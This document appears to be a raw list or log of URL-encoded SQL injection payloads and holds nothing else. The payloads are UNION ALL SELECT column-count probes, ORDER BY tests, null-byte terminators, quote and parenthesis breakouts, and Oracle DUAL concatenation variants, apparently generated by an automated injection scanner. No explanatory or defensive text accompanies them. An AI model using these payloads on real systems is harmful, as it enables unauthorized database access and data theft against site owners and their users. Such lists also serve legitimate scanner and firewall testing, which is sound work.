-8101%22%29%29%29%20UNION%20ALL%20SELECT%201971%2C%201971%00%20AND%20%28%28%28%22bnSE%22%3D%22bnSE -9595%22%29%29%29%20UNION%20ALL%20SELECT%209633%2C%209633%2C%209633%00%20AND%20%28%28%28%22ARoG%22%3D%22ARoG -5887%22%29%29%29%20UNION%20ALL%20SELECT%205382%2C%205382%2C%205382%2C%205382%00%20AND%20%28%28%28%22DNdR%22%3D%22DNdR -4255%22%29%29%29%20UNION%20ALL%20SELECT%206313%2C%206313%2C%206313%2C%206313%2C%206313%00%20AND%20%28%28%28%22pDNv%22%3D%22pDNv -6786%22%29%29%29%20UNION%20ALL%20SELECT%202555%2C%202555%2C%202555%2C%202555%2C%202555%2C%202555%00%20AND%20%28%28%28%22sFxB%22%3D%22sFxB -4983%22%29%29%29%20UNION%20ALL%20SELECT%202791%2C%202791%2C%202791%2C%202791%2C%202791%2C%202791%2C%202791%00%20AND%20%28%28%28%22IKpm%22%3D%22IKpm -7228%22%29%29%29%20UNION%20ALL%20SELECT%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%2C%204845%00%20AND%20%28%28%28%22kdvs%22%3D%22kdvs -6386%22%29%29%29%20UNION%20ALL%20SELECT%201047%2C%201047%2C%201047%2C%201047%2C%201047%2C%201047%2C%201047%2C%201047%2C%201047%00%20AND%20%28%28%28%22VzoN%22%3D%22VzoN -4982%22%29%29%29%20UNION%20ALL%20SELECT%202295%2C%202295%2C%202295%2C%202295%2C%202295%2C%202295%2C%202295%2C%202295%2C%202295%2C%202295%00%20AND%20%28%28%28%22DyVK%22%3D%22DyVK -7405%22%20ORDER%20BY%201%00%20AND%20%22hHTp%22%3D%22hHTp -1090%22%20ORDER%20BY%203769%00%20AND%20%22QYGG%22%3D%22QYGG -1789%22%20UNION%20ALL%20SELECT%204192%00%20AND%20%22GRgg%22%3D%22GRgg -2019%22%20UNION%20ALL%20SELECT%207798%2C%207798%00%20AND%20%22kkCL%22%3D%22kkCL -3488%22%20UNION%20ALL%20SELECT%202523%2C%202523%2C%202523%00%20AND%20%22khBH%22%3D%22khBH -4725%22%20UNION%20ALL%20SELECT%202780%2C%202780%2C%202780%2C%202780%00%20AND%20%22iIuU%22%3D%22iIuU -8416%22%20UNION%20ALL%20SELECT%205856%2C%205856%2C%205856%2C%205856%2C%205856%00%20AND%20%22LjYl%22%3D%22LjYl -6957%22%20UNION%20ALL%20SELECT%205931%2C%205931%2C%205931%2C%205931%2C%205931%2C%205931%00%20AND%20%22jBFE%22%3D%22jBFE -3770%22%20UNION%20ALL%20SELECT%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%2C%203107%00%20AND%20%22yiJT%22%3D%22yiJT -8382%22%20UNION%20ALL%20SELECT%201565%2C%201565%2C%201565%2C%201565%2C%201565%2C%201565%2C%201565%2C%201565%00%20AND%20%22SwjL%22%3D%22SwjL -6454%22%20UNION%20ALL%20SELECT%207700%2C%207700%2C%207700%2C%207700%2C%207700%2C%207700%2C%207700%2C%207700%2C%207700%00%20AND%20%22EztX%22%3D%22EztX -5992%22%20UNION%20ALL%20SELECT%202747%2C%202747%2C%202747%2C%202747%2C%202747%2C%202747%2C%202747%2C%202747%2C%202747%2C%202747%00%20AND%20%22Jxeu%22%3D%22Jxeu -5420%22%29%20ORDER%20BY%201%00%20AND%20%28%22kUVB%22%20LIKE%20%22kUVB -7735%22%29%20ORDER%20BY%205712%00%20AND%20%28%22bIyI%22%20LIKE%20%22bIyI -3921%22%29%20UNION%20ALL%20SELECT%204231%00%20AND%20%28%22Wtxz%22%20LIKE%20%22Wtxz -4380%22%29%20UNION%20ALL%20SELECT%205009%2C%205009%00%20AND%20%28%22jBcd%22%20LIKE%20%22jBcd -6625%22%29%20UNION%20ALL%20SELECT%205856%2C%205856%2C%205856%00%20AND%20%28%22MHVx%22%20LIKE%20%22MHVx -2993%22%29%20UNION%20ALL%20SELECT%209941%2C%209941%2C%209941%2C%209941%00%20AND%20%28%22Cpck%22%20LIKE%20%22Cpck -5692%22%29%20UNION%20ALL%20SELECT%201474%2C%201474%2C%201474%2C%201474%2C%201474%00%20AND%20%28%22OSJS%22%20LIKE%20%22OSJS -9675%22%29%20UNION%20ALL%20SELECT%203193%2C%203193%2C%203193%2C%203193%2C%203193%2C%203193%00%20AND%20%28%22yLeE%22%20LIKE%20%22yLeE -8240%22%29%20UNION%20ALL%20SELECT%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%2C%209043%00%20AND%20%28%22ROZo%22%20LIKE%20%22ROZo -5747%22%29%20UNION%20ALL%20SELECT%205534%2C%205534%2C%205534%2C%205534%2C%205534%2C%205534%2C%205534%2C%205534%00%20AND%20%28%22OnKn%22%20LIKE%20%22OnKn -9430%22%29%20UNION%20ALL%20SELECT%206076%2C%206076%2C%206076%2C%206076%2C%206076%2C%206076%2C%206076%2C%206076%2C%206076%00%20AND%20%28%22hDWC%22%20LIKE%20%22hDWC -6709%22%29%20UNION%20ALL%20SELECT%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%2C%201218%00%20AND%20%28%22UFiv%22%20LIKE%20%22UFiv -6956%22%29%29%20ORDER%20BY%201%00%20AND%20%28%28%22sZdK%22%20LIKE%20%22sZdK -6828%22%29%29%20ORDER%20BY%203585%00%20AND%20%28%28%22JuJV%22%20LIKE%20%22JuJV -2150%22%29%29%20UNION%20ALL%20SELECT%201978%00%20AND%20%28%28%22IDWt%22%20LIKE%20%22IDWt -7356%22%29%29%20UNION%20ALL%20SELECT%209203%2C%209203%00%20AND%20%28%28%22Fipq%22%20LIKE%20%22Fipq -5693%22%29%29%20UNION%20ALL%20SELECT%208197%2C%208197%2C%208197%00%20AND%20%28%28%22Ikkv%22%20LIKE%20%22Ikkv -9145%22%29%29%20UNION%20ALL%20SELECT%208252%2C%208252%2C%208252%2C%208252%00%20AND%20%28%28%22uAwN%22%20LIKE%20%22uAwN -2784%22%29%29%20UNION%20ALL%20SELECT%202849%2C%202849%2C%202849%2C%202849%2C%202849%00%20AND%20%28%28%22ialQ%22%20LIKE%20%22ialQ -9538%22%29%29%20UNION%20ALL%20SELECT%204759%2C%204759%2C%204759%2C%204759%2C%204759%2C%204759%00%20AND%20%28%28%22FGQG%22%20LIKE%20%22FGQG -3310%22%29%29%20UNION%20ALL%20SELECT%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%2C%201160%00%20AND%20%28%28%22RGND%22%20LIKE%20%22RGND -1528%22%29%29%20UNION%20ALL%20SELECT%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%2C%204288%00%20AND%20%28%28%22BvYt%22%20LIKE%20%22BvYt -3399%22%29%29%20UNION%20ALL%20SELECT%206930%2C%206930%2C%206930%2C%206930%2C%206930%2C%206930%2C%206930%2C%206930%2C%206930%00%20AND%20%28%28%22EpoZ%22%20LIKE%20%22EpoZ -9605%22%29%29%20UNION%20ALL%20SELECT%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%2C%205129%00%20AND%20%28%28%22RdpU%22%20LIKE%20%22RdpU -9585%22%29%29%29%20ORDER%20BY%201%00%20AND%20%28%28%28%22JMqU%22%20LIKE%20%22JMqU -4259%22%29%29%29%20ORDER%20BY%205094%00%20AND%20%28%28%28%22xWNG%22%20LIKE%20%22xWNG -7390%22%29%29%29%20UNION%20ALL%20SELECT%207767%00%20AND%20%28%28%28%22nDBK%22%20LIKE%20%22nDBK -8825%22%29%29%29%20UNION%20ALL%20SELECT%207507%2C%207507%00%20AND%20%28%28%28%22jGuv%22%20LIKE%20%22jGuv -7254%22%29%29%29%20UNION%20ALL%20SELECT%208061%2C%208061%2C%208061%00%20AND%20%28%28%28%22YMIS%22%20LIKE%20%22YMIS -2993%22%29%29%29%20UNION%20ALL%20SELECT%204947%2C%204947%2C%204947%2C%204947%00%20AND%20%28%28%28%22SJdr%22%20LIKE%20%22SJdr -1103%22%29%29%29%20UNION%20ALL%20SELECT%207646%2C%207646%2C%207646%2C%207646%2C%207646%00%20AND%20%28%28%28%22xNht%22%20LIKE%20%22xNht -4527%22%29%29%29%20UNION%20ALL%20SELECT%204241%2C%204241%2C%204241%2C%204241%2C%204241%2C%204241%00%20AND%20%28%28%28%22DYjR%22%20LIKE%20%22DYjR -9436%22%29%29%29%20UNION%20ALL%20SELECT%206960%2C%206960%2C%206960%2C%206960%2C%206960%2C%206960%2C%206960%00%20AND%20%28%28%28%22TOZx%22%20LIKE%20%22TOZx -3656%22%29%29%29%20UNION%20ALL%20SELECT%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%2C%201703%00%20AND%20%28%28%28%22AWnz%22%20LIKE%20%22AWnz -4392%22%29%29%29%20UNION%20ALL%20SELECT%207251%2C%207251%2C%207251%2C%207251%2C%207251%2C%207251%2C%207251%2C%207251%2C%207251%00%20AND%20%28%28%28%22KkmS%22%20LIKE%20%22KkmS -5546%22%29%29%29%20UNION%20ALL%20SELECT%206137%2C%206137%2C%206137%2C%206137%2C%206137%2C%206137%2C%206137%2C%206137%2C%206137%2C%206137%00%20AND%20%28%28%28%22Jdfv%22%20LIKE%20%22Jdfv -4329%22%20ORDER%20BY%201%00%20AND%20%22Neos%22%20LIKE%20%22Neos -6112%22%20ORDER%20BY%206899%00%20AND%20%22fNKU%22%20LIKE%20%22fNKU -5230%22%20UNION%20ALL%20SELECT%209517%00%20AND%20%22AIVs%22%20LIKE%20%22AIVs -4460%22%20UNION%20ALL%20SELECT%206067%2C%206067%00%20AND%20%22DlHp%22%20LIKE%20%22DlHp -9851%22%20UNION%20ALL%20SELECT%202998%2C%202998%2C%202998%00%20AND%20%22xwlF%22%20LIKE%20%22xwlF -6414%22%20UNION%20ALL%20SELECT%208615%2C%208615%2C%208615%2C%208615%00%20AND%20%22LRHl%22%20LIKE%20%22LRHl -4300%22%20UNION%20ALL%20SELECT%209984%2C%209984%2C%209984%2C%209984%2C%209984%00%20AND%20%22vHuG%22%20LIKE%20%22vHuG -4676%22%20UNION%20ALL%20SELECT%208806%2C%208806%2C%208806%2C%208806%2C%208806%2C%208806%00%20AND%20%22Vxsk%22%20LIKE%20%22Vxsk -1170%22%20UNION%20ALL%20SELECT%206252%2C%206252%2C%206252%2C%206252%2C%206252%2C%206252%2C%206252%00%20AND%20%22zeCd%22%20LIKE%20%22zeCd -9057%22%20UNION%20ALL%20SELECT%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%2C%208045%00%20AND%20%22YvoW%22%20LIKE%20%22YvoW -1853%22%20UNION%20ALL%20SELECT%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%2C%204158%00%20AND%20%22SMyN%22%20LIKE%20%22SMyN -6971%22%20UNION%20ALL%20SELECT%206522%2C%206522%2C%206522%2C%206522%2C%206522%2C%206522%2C%206522%2C%206522%2C%206522%2C%206522%00%20AND%20%22sYtO%22%20LIKE%20%22sYtO -3647%29%20WHERE%202654%3D2654%20ORDER%20BY%201%00 -2743%29%20WHERE%204238%3D4238%20ORDER%20BY%203518%00 -9259%29%20WHERE%207892%3D7892%20UNION%20ALL%20SELECT%207892%00 -4553%29%20WHERE%203199%3D3199%20UNION%20ALL%20SELECT%203199%2C%203199%00 -1338%29%20WHERE%201135%3D1135%20UNION%20ALL%20SELECT%201135%2C%201135%2C%201135%00 -2982%29%20WHERE%203796%3D3796%20UNION%20ALL%20SELECT%203796%2C%203796%2C%203796%2C%203796%00 -5840%29%20WHERE%202192%3D2192%20UNION%20ALL%20SELECT%202192%2C%202192%2C%202192%2C%202192%2C%202192%00 -5383%29%20WHERE%204328%3D4328%20UNION%20ALL%20SELECT%204328%2C%204328%2C%204328%2C%204328%2C%204328%2C%204328%00 -6909%29%20WHERE%205718%3D5718%20UNION%20ALL%20SELECT%205718%2C%205718%2C%205718%2C%205718%2C%205718%2C%205718%2C%205718%00 -1258%29%20WHERE%206051%3D6051%20UNION%20ALL%20SELECT%206051%2C%206051%2C%206051%2C%206051%2C%206051%2C%206051%2C%206051%2C%206051%00 -1939%29%20WHERE%202780%3D2780%20UNION%20ALL%20SELECT%202780%2C%202780%2C%202780%2C%202780%2C%202780%2C%202780%2C%202780%2C%202780%2C%202780%00 -9147%29%20WHERE%203376%3D3376%20UNION%20ALL%20SELECT%203376%2C%203376%2C%203376%2C%203376%2C%203376%2C%203376%2C%203376%2C%203376%2C%203376%2C%203376%00 -9201%27%29%20WHERE%209660%3D9660%20ORDER%20BY%201%00 -8257%27%29%20WHERE%204864%3D4864%20ORDER%20BY%205174%00 -8023%27%29%20WHERE%206266%3D6266%20UNION%20ALL%20SELECT%206266%00 -2566%27%29%20WHERE%209488%3D9488%20UNION%20ALL%20SELECT%209488%2C%209488%00 -1217%27%29%20WHERE%206086%3D6086%20UNION%20ALL%20SELECT%206086%2C%206086%2C%206086%00 -6452%27%29%20WHERE%206853%3D6853%20UNION%20ALL%20SELECT%206853%2C%206853%2C%206853%2C%206853%00 -3451%27%29%20WHERE%202382%3D2382%20UNION%20ALL%20SELECT%202382%2C%202382%2C%202382%2C%202382%2C%202382%00 -2242%27%29%20WHERE%201648%3D1648%20UNION%20ALL%20SELECT%201648%2C%201648%2C%201648%2C%201648%2C%201648%2C%201648%00 -5504%27%29%20WHERE%201213%3D1213%20UNION%20ALL%20SELECT%201213%2C%201213%2C%201213%2C%201213%2C%201213%2C%201213%2C%201213%00 -9933%27%29%20WHERE%203942%3D3942%20UNION%20ALL%20SELECT%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%2C%203942%00 -7310%27%29%20WHERE%205022%3D5022%20UNION%20ALL%20SELECT%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%2C%205022%00 -1570%27%29%20WHERE%204293%3D4293%20UNION%20ALL%20SELECT%204293%2C%204293%2C%204293%2C%204293%2C%204293%2C%204293%2C%204293%2C%204293%2C%204293%2C%204293%00 -5657%27%20WHERE%202844%3D2844%20ORDER%20BY%201%00 -6554%27%20WHERE%208196%3D8196%20ORDER%20BY%204088%00 -3908%27%20WHERE%201595%3D1595%20UNION%20ALL%20SELECT%201595%00 -8266%27%20WHERE%205007%3D5007%20UNION%20ALL%20SELECT%205007%2C%205007%00 -7821%27%20WHERE%209968%3D9968%20UNION%20ALL%20SELECT%209968%2C%209968%2C%209968%00 -4999%27%20WHERE%201841%3D1841%20UNION%20ALL%20SELECT%201841%2C%201841%2C%201841%2C%201841%00 -5502%27%20WHERE%206896%3D6896%20UNION%20ALL%20SELECT%206896%2C%206896%2C%206896%2C%206896%2C%206896%00 -4512%27%20WHERE%206410%3D6410%20UNION%20ALL%20SELECT%206410%2C%206410%2C%206410%2C%206410%2C%206410%2C%206410%00 -5329%27%20WHERE%204612%3D4612%20UNION%20ALL%20SELECT%204612%2C%204612%2C%204612%2C%204612%2C%204612%2C%204612%2C%204612%00 -3387%27%20WHERE%206442%3D6442%20UNION%20ALL%20SELECT%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%2C%206442%00 -4029%27%20WHERE%203574%3D3574%20UNION%20ALL%20SELECT%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%2C%203574%00 -2893%27%20WHERE%203743%3D3743%20UNION%20ALL%20SELECT%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%2C%203743%00 -2247%22%20WHERE%203301%3D3301%20ORDER%20BY%201%00 -7456%22%20WHERE%209805%3D9805%20ORDER%20BY%201982%00 -3561%22%20WHERE%206770%3D6770%20UNION%20ALL%20SELECT%206770%00 -9124%22%20WHERE%203626%3D3626%20UNION%20ALL%20SELECT%203626%2C%203626%00 -2497%22%20WHERE%207129%3D7129%20UNION%20ALL%20SELECT%207129%2C%207129%2C%207129%00 -3506%22%20WHERE%207558%3D7558%20UNION%20ALL%20SELECT%207558%2C%207558%2C%207558%2C%207558%00 -9301%22%20WHERE%206766%3D6766%20UNION%20ALL%20SELECT%206766%2C%206766%2C%206766%2C%206766%2C%206766%00 -5452%22%20WHERE%204956%3D4956%20UNION%20ALL%20SELECT%204956%2C%204956%2C%204956%2C%204956%2C%204956%2C%204956%00 -9920%22%20WHERE%203191%3D3191%20UNION%20ALL%20SELECT%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%2C%203191%00 -1639%22%20WHERE%202201%3D2201%20UNION%20ALL%20SELECT%202201%2C%202201%2C%202201%2C%202201%2C%202201%2C%202201%2C%202201%2C%202201%00 -7049%22%20WHERE%207054%3D7054%20UNION%20ALL%20SELECT%207054%2C%207054%2C%207054%2C%207054%2C%207054%2C%207054%2C%207054%2C%207054%2C%207054%00 -4865%22%20WHERE%201794%3D1794%20UNION%20ALL%20SELECT%201794%2C%201794%2C%201794%2C%201794%2C%201794%2C%201794%2C%201794%2C%201794%2C%201794%2C%201794%00 -5337%27%20%7C%7C%20%28SELECT%209495%20FROM%20DUAL%20WHERE%205186%3D5186%20ORDER%20BY%201%00%20%29%20%7C%7C%20%27 -3232%27%20%7C%7C%20%28SELECT%205096%20FROM%20DUAL%20WHERE%205557%3D5557%20ORDER%20BY%201821%00%20%29%20%7C%7C%20%27 -7212%27%20%7C%7C%20%28SELECT%202559%20FROM%20DUAL%20WHERE%203032%3D3032%20UNION%20ALL%20SELECT%203032%00%20%29%20%7C%7C%20%27 -4811%27%20%7C%7C%20%28SELECT%209694%20FROM%20DUAL%20WHERE%204378%3D4378%20UNION%20ALL%20SELECT%204378%2C%204378%00%20%29%20%7C%7C%20%27 -7623%27%20%7C%7C%20%28SELECT%201278%20FROM%20DUAL%20WHERE%202330%3D2330%20UNION%20ALL%20SELECT%202330%2C%202330%2C%202330%00%20%29%20%7C%7C%20%27 -9222%27%20%7C%7C%20%28SELECT%207655%20FROM%20DUAL%20WHERE%209596%3D9596%20UNION%20ALL%20SELECT%209596%2C%209596%2C%209596%2C%209596%00%20%29%20%7C%7C%20%27 -2369%27%20%7C%7C%20%28SELECT%209340%20FROM%20DUAL%20WHERE%203883%3D3883%20UNION%20ALL%20SELECT%203883%2C%203883%2C%203883%2C%203883%2C%203883%00%20%29%20%7C%7C%20%27 -1300%27%20%7C%7C%20%28SELECT%203490%20FROM%20DUAL%20WHERE%202076%3D2076%20UNION%20ALL%20SELECT%202076%2C%202076%2C%202076%2C%202076%2C%202076%2C%202076%00%20%29%20%7C%7C%20%27 -9062%27%20%7C%7C%20%28SELECT%205056%20FROM%20DUAL%20WHERE%209666%3D9666%20UNION%20ALL%20SELECT%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%2C%209666%00%20%29%20%7C%7C%20%27 -2027%27%20%7C%7C%20%28SELECT%202362%20FROM%20DUAL%20WHERE%209701%3D9701%20UNION%20ALL%20SELECT%209701%2C%209701%2C%209701%2C%209701%2C%209701%2C%209701%2C%209701%2C%209701%00%20%29%20%7C%7C%20%27 -2617%27%20%7C%7C%20%28SELECT%207799%20FROM%20DUAL%20WHERE%201548%3D1548%20UNION%20ALL%20SELECT%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%2C%201548%00%20%29%20%7C%7C%20%27 -6464%27%20%7C%7C%20%28SELECT%202240%20FROM%20DUAL%20WHERE%201761%3D1761%20UNION%20ALL%20SELECT%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%2C%201761%00%20%29%20%7C%7C%20%27 -7015%27%20%7C%7C%20%28SELECT%204023%20WHERE%202449%3D2449%20ORDER%20BY%201%00%20%29%20%7C%7C%20%27 -5347%27%20%7C%7C%20%28SELECT%201989%20WHERE%202412%3D2412%20ORDER%20BY%204592%00%20%29%20%7C%7C%20%27 -7249%27%20%7C%7C%20%28SELECT%205109%20WHERE%209027%3D9027%20UNION%20ALL%20SELECT%209027%00%20%29%20%7C%7C%20%27 -2449%27%20%7C%7C%20%28SELECT%203603%20WHERE%205616%3D5616%20UNION%20ALL%20SELECT%205616%2C%205616%00%20%29%20%7C%7C%20%27 -2118%27%20%7C%7C%20%28SELECT%203050%20WHERE%202116%3D2116%20UNION%20ALL%20SELECT%202116%2C%202116%2C%202116%00%20%29%20%7C%7C%20%27 -7652%27%20%7C%7C%20%28SELECT%205387%20WHERE%201710%3D1710%20UNION%20ALL%20SELECT%201710%2C%201710%2C%201710%2C%201710%00%20%29%20%7C%7C%20%27 -1198%27%20%7C%7C%20%28SELECT%201499%20WHERE%209021%3D9021%20UNION%20ALL%20SELECT%209021%2C%209021%2C%209021%2C%209021%2C%209021%00%20%29%20%7C%7C%20%27 -1359%27%20%7C%7C%20%28SELECT%209713%20WHERE%202879%3D2879%20UNION%20ALL%20SELECT%202879%2C%202879%2C%202879%2C%202879%2C%202879%2C%202879%00%20%29%20%7C%7C%20%27 -1917%27%20%7C%7C%20%28SELECT%204787%20WHERE%209794%3D9794%20UNION%20ALL%20SELECT%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%00%20%29%20%7C%7C%20%27 -6475%27%20%7C%7C%20%28SELECT%205000%20WHERE%201745%3D1745%20UNION%20ALL%20SELECT%201745%2C%201745%2C%201745%2C%201745%2C%201745%2C%201745%2C%201745%2C%201745%00%20%29%20%7C%7C%20%27 -1281%27%20%7C%7C%20%28SELECT%207579%20WHERE%206404%3D6404%20UNION%20ALL%20SELECT%206404%2C%206404%2C%206404%2C%206404%2C%206404%2C%206404%2C%206404%2C%206404%2C%206404%00%20%29%20%7C%7C%20%27 -2530%27%20%7C%7C%20%28SELECT%202723%20WHERE%205972%3D5972%20UNION%20ALL%20SELECT%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%2C%205972%00%20%29%20%7C%7C%20%27 -6151%20%2B%20%28SELECT%202280%20FROM%20DUAL%20WHERE%206721%3D6721%20ORDER%20BY%201%00%20%29 -9662%20%2B%20%28SELECT%205531%20FROM%20DUAL%20WHERE%205484%3D5484%20ORDER%20BY%208204%00%20%29 -6758%20%2B%20%28SELECT%206991%20FROM%20DUAL%20WHERE%204251%3D4251%20UNION%20ALL%20SELECT%204251%00%20%29 -5531%20%2B%20%28SELECT%205894%20FROM%20DUAL%20WHERE%209390%3D9390%20UNION%20ALL%20SELECT%209390%2C%209390%00%20%29 -2132%20%2B%20%28SELECT%208946%20FROM%20DUAL%20WHERE%209892%3D9892%20UNION%20ALL%20SELECT%209892%2C%209892%2C%209892%00%20%29 -3601%20%2B%20%28SELECT%209287%20FROM%20DUAL%20WHERE%207169%3D7169%20UNION%20ALL%20SELECT%207169%2C%207169%2C%207169%2C%207169%00%20%29 -4610%20%2B%20%28SELECT%201984%20FROM%20DUAL%20WHERE%207483%3D7483%20UNION%20ALL%20SELECT%207483%2C%207483%2C%207483%2C%207483%2C%207483%00%20%29 -9092%20%2B%20%28SELECT%205150%20FROM%20DUAL%20WHERE%206102%3D6102%20UNION%20ALL%20SELECT%206102%2C%206102%2C%206102%2C%206102%2C%206102%2C%206102%00%20%29 -3482%20%2B%20%28SELECT%201028%20FROM%20DUAL%20WHERE%207006%3D7006%20UNION%20ALL%20SELECT%207006%2C%207006%2C%207006%2C%207006%2C%207006%2C%207006%2C%207006%00%20%29 -7139%20%2B%20%28SELECT%208623%20FROM%20DUAL%20WHERE%206992%3D6992%20UNION%20ALL%20SELECT%206992%2C%206992%2C%206992%2C%206992%2C%206992%2C%206992%2C%206992%2C%206992%00%20%29 -7633%20%2B%20%28SELECT%203581%20FROM%20DUAL%20WHERE%204373%3D4373%20UNION%20ALL%20SELECT%204373%2C%204373%2C%204373%2C%204373%2C%204373%2C%204373%2C%204373%2C%204373%2C%204373%00%20%29 -3588%20%2B%20%28SELECT%209503%20FROM%20DUAL%20WHERE%209747%3D9747%20UNION%20ALL%20SELECT%209747%2C%209747%2C%209747%2C%209747%2C%209747%2C%209747%2C%209747%2C%209747%2C%209747%2C%209747%00%20%29 -9443%20%2B%20%28SELECT%204525%20WHERE%208835%3D8835%20ORDER%20BY%201%00%20%29 -5529%20%2B%20%28SELECT%204042%20WHERE%201575%3D1575%20ORDER%20BY%204345%00%20%29 -2797%20%2B%20%28SELECT%205745%20WHERE%203130%3D3130%20UNION%20ALL%20SELECT%203130%00%20%29 -9679%20%2B%20%28SELECT%203926%20WHERE%206917%3D6917%20UNION%20ALL%20SELECT%206917%2C%206917%00%20%29 -7569%20%2B%20%28SELECT%207633%20WHERE%201399%3D1399%20UNION%20ALL%20SELECT%201399%2C%201399%2C%201399%00%20%29 -6438%20%2B%20%28SELECT%201179%20WHERE%207623%3D7623%20UNION%20ALL%20SELECT%207623%2C%207623%2C%207623%2C%207623%00%20%29 -9946%20%2B%20%28SELECT%201200%20WHERE%206604%3D6604%20UNION%20ALL%20SELECT%206604%2C%206604%2C%206604%2C%206604%2C%206604%00%20%29 -8476%20%2B%20%28SELECT%202206%20WHERE%204836%3D4836%20UNION%20ALL%20SELECT%204836%2C%204836%2C%204836%2C%204836%2C%204836%2C%204836%00%20%29 -7876%20%2B%20%28SELECT%206520%20WHERE%204822%3D4822%20UNION%20ALL%20SELECT%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%2C%204822%00%20%29 -1702%20%2B%20%28SELECT%206318%20WHERE%206990%3D6990%20UNION%20ALL%20SELECT%206990%2C%206990%2C%206990%2C%206990%2C%206990%2C%206990%2C%206990%2C%206990%00%20%29 -5580%20%2B%20%28SELECT%205246%20WHERE%208587%3D8587%20UNION%20ALL%20SELECT%208587%2C%208587%2C%208587%2C%208587%2C%208587%2C%208587%2C%208587%2C%208587%2C%208587%00%20%29 -6621%20%2B%20%28SELECT%204935%20WHERE%205360%3D5360%20UNION%20ALL%20SELECT%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%2C%205360%00%20%29 -9706%27%20%2B%20%28SELECT%20%27dNdp%27%20FROM%20DUAL%20WHERE%201777%3D1777%20ORDER%20BY%201%00%20%29%20%2B%20%27 -3000%27%20%2B%20%28SELECT%20%27yxNi%27%20FROM%20DUAL%20WHERE%203430%3D3430%20ORDER%20BY%203705%00%20%29%20%2B%20%27 -9566%27%20%2B%20%28SELECT%20%27IjpR%27%20FROM%20DUAL%20WHERE%201393%3D1393%20UNION%20ALL%20SELECT%201393%00%20%29%20%2B%20%27 -7536%27%20%2B%20%28SELECT%20%27LnfK%27%20FROM%20DUAL%20WHERE%208189%3D8189%20UNION%20ALL%20SELECT%208189%2C%208189%00%20%29%20%2B%20%27 -6367%27%20%2B%20%28SELECT%20%27IMfk%27%20FROM%20DUAL%20WHERE%202003%3D2003%20UNION%20ALL%20SELECT%202003%2C%202003%2C%202003%00%20%29%20%2B%20%27 -8061%27%20%2B%20%28SELECT%20%27Ywyg%27%20FROM%20DUAL%20WHERE%204044%3D4044%20UNION%20ALL%20SELECT%204044%2C%204044%2C%204044%2C%204044%00%20%29%20%2B%20%27 -1148%27%20%2B%20%28SELECT%20%27lbtg%27%20FROM%20DUAL%20WHERE%205616%3D5616%20UNION%20ALL%20SELECT%205616%2C%205616%2C%205616%2C%205616%2C%205616%00%20%29%20%2B%20%27 -9932%27%20%2B%20%28SELECT%20%27miim%27%20FROM%20DUAL%20WHERE%208544%3D8544%20UNION%20ALL%20SELECT%208544%2C%208544%2C%208544%2C%208544%2C%208544%2C%208544%00%20%29%20%2B%20%27 -6644%27%20%2B%20%28SELECT%20%27gFiA%27%20FROM%20DUAL%20WHERE%209730%3D9730%20UNION%20ALL%20SELECT%209730%2C%209730%2C%209730%2C%209730%2C%209730%2C%209730%2C%209730%00%20%29%20%2B%20%27 -3118%27%20%2B%20%28SELECT%20%27vnnk%27%20FROM%20DUAL%20WHERE%201389%3D1389%20UNION%20ALL%20SELECT%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%2C%201389%00%20%29%20%2B%20%27 -2842%27%20%2B%20%28SELECT%20%27lWfW%27%20FROM%20DUAL%20WHERE%209660%3D9660%20UNION%20ALL%20SELECT%209660%2C%209660%2C%209660%2C%209660%2C%209660%2C%209660%2C%209660%2C%209660%2C%209660%00%20%29%20%2B%20%27 -3712%27%20%2B%20%28SELECT%20%27TPcr%27%20FROM%20DUAL%20WHERE%204089%3D4089%20UNION%20ALL%20SELECT%204089%2C%204089%2C%204089%2C%204089%2C%204089%2C%204089%2C%204089%2C%204089%2C%204089%2C%204089%00%20%29%20%2B%20%27 -1210%27%20%2B%20%28SELECT%20%27ObMP%27%20WHERE%206521%3D6521%20ORDER%20BY%201%00%20%29%20%2B%20%27 -3448%27%20%2B%20%28SELECT%20%27rzIN%27%20WHERE%204348%3D4348%20ORDER%20BY%206984%00%20%29%20%2B%20%27 -4039%27%20%2B%20%28SELECT%20%27fdvz%27%20WHERE%207571%3D7571%20UNION%20ALL%20SELECT%207571%00%20%29%20%2B%20%27 -4816%27%20%2B%20%28SELECT%20%27SnGh%27%20WHERE%209956%3D9956%20UNION%20ALL%20SELECT%209956%2C%209956%00%20%29%20%2B%20%27 -8305%27%20%2B%20%28SELECT%20%27CjGw%27%20WHERE%208915%3D8915%20UNION%20ALL%20SELECT%208915%2C%208915%2C%208915%00%20%29%20%2B%20%27 -6695%27%20%2B%20%28SELECT%20%27vBaw%27%20WHERE%207519%3D7519%20UNION%20ALL%20SELECT%207519%2C%207519%2C%207519%2C%207519%00%20%29%20%2B%20%27 